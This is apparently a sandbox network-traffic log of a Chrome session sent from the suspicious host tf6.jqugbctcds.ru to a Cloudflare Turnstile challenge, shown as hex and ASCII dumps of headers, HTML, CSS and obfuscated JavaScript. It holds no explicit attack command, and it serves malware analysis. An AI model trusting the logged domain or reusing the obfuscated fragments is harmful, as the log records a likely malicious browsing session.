                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                            Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.449756104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:45 UTC797OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                            Referer: https://tf6.jqugbctcds.ru/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:45 UTC1362INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:45 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 26678
                                                                                                            Connection: close
                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                            cross-origin-embedder-policy: require-corp
                                                                                                            cross-origin-opener-policy: same-origin
                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                            origin-agent-cluster: ?1
                                                                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                            referrer-policy: same-origin
                                                                                                            document-policy: js-profiling
                                                                                                            2024-12-21 23:46:45 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 35 62 63 30 64 39 36 61 38 62 30 63 61 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                            Data Ascii: Server: cloudflareCF-RAY: 8f5bc0d96a8b0caa-EWRalt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:45 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.449758104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:46 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f5bc0d96a8b0caa&lang=auto HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: script
                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:47 UTC331INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:47 GMT
                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                            Content-Length: 127844
                                                                                                            Connection: close
                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0e41c5241f3-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:47 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                            2024-12-21 23:46:47 UTC1369INData Raw: 72 65 25 33 46 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f
                                                                                                            Data Ascii: re%3F","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.co
                                                                                                            2024-12-21 23:46:47 UTC1369INData Raw: 2c 66 5a 2c 67 76 2c 67 7a 2c 67 41 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 66 57 2c 66 58 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 31 32 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 36 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 31 33 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 32 33 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 37 32 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 34 32 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 30 36 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74
                                                                                                            Data Ascii: ,fZ,gv,gz,gA,gE,gF,gG,gH,fW,fX){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1312))/1*(-parseInt(gI(1286))/2)+-parseInt(gI(913))/3+-parseInt(gI(1123))/4+-parseInt(gI(572))/5+-parseInt(gI(942))/6*(parseInt(gI(1706))/7)+-parseInt
                                                                                                            2024-12-21 23:46:47 UTC1369INData Raw: 7d 2c 27 42 58 4f 73 55 27 3a 65 5b 68 38 28 31 39 36 32 29 5d 7d 2c 65 5b 68 38 28 31 32 30 37 29 5d 28 68 38 28 31 34 37 33 29 2c 65 5b 68 38 28 38 37 37 29 5d 29 29 7b 69 66 28 65 4d 5b 65 5b 68 38 28 35 34 33 29 5d 5d 29 7b 69 66 28 65 5b 68 38 28 31 33 36 39 29 5d 28 68 38 28 31 30 30 31 29 2c 65 5b 68 38 28 31 36 31 37 29 5d 29 29 65 4d 5b 68 38 28 31 39 35 32 29 5d 5b 68 38 28 39 31 30 29 5d 28 29 2c 65 4d 5b 68 38 28 31 39 35 32 29 5d 5b 68 38 28 38 31 30 29 5d 28 29 2c 65 4d 5b 68 38 28 39 33 33 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 38 28 31 33 31 38 29 5d 5b 68 38 28 31 33 35 38 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 68 38 28 32 30 30 32 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 38 28 31 32 34 33 29 5d 5b 68 38 28 31 31 39 36 29
                                                                                                            Data Ascii: },'BXOsU':e[h8(1962)]},e[h8(1207)](h8(1473),e[h8(877)])){if(eM[e[h8(543)]]){if(e[h8(1369)](h8(1001),e[h8(1617)]))eM[h8(1952)][h8(910)](),eM[h8(1952)][h8(810)](),eM[h8(933)]=!![],eM[h8(1318)][h8(1358)]({'source':e[h8(2002)],'widgetId':eM[h8(1243)][h8(1196)
                                                                                                            2024-12-21 23:46:47 UTC1369INData Raw: 4e 5b 68 39 28 32 30 31 31 29 5d 28 66 5b 68 39 28 31 30 39 30 29 5d 2c 4f 62 6a 65 63 74 5b 68 39 28 31 35 30 32 29 5d 28 66 5b 68 39 28 31 30 39 30 29 5d 29 29 3a 66 5b 68 39 28 31 30 39 30 29 5d 3d 4a 53 4f 4e 5b 68 39 28 32 30 31 31 29 5d 28 66 5b 68 39 28 31 30 39 30 29 5d 29 2c 6b 3d 68 7c 7c 68 39 28 31 39 34 33 29 2c 6c 3d 65 4d 5b 68 39 28 31 32 34 33 29 5d 5b 68 39 28 38 36 36 29 5d 3f 69 5b 68 39 28 36 33 31 29 5d 28 69 5b 68 39 28 35 31 35 29 5d 28 27 68 2f 27 2c 65 4d 5b 68 39 28 31 32 34 33 29 5d 5b 68 39 28 38 36 36 29 5d 29 2c 27 2f 27 29 3a 27 27 2c 6d 3d 69 5b 68 39 28 36 33 31 29 5d 28 69 5b 68 39 28 31 39 33 39 29 5d 28 69 5b 68 39 28 31 31 39 35 29 5d 28 69 5b 68 39 28 35 31 35 29 5d 28 69 5b 68 39 28 31 38 30 32 29 5d 2b 6c 2c 69 5b
                                                                                                            Data Ascii: N[h9(2011)](f[h9(1090)],Object[h9(1502)](f[h9(1090)])):f[h9(1090)]=JSON[h9(2011)](f[h9(1090)]),k=h||h9(1943),l=eM[h9(1243)][h9(866)]?i[h9(631)](i[h9(515)]('h/',eM[h9(1243)][h9(866)]),'/'):'',m=i[h9(631)](i[h9(1939)](i[h9(1195)](i[h9(515)](i[h9(1802)]+l,i[
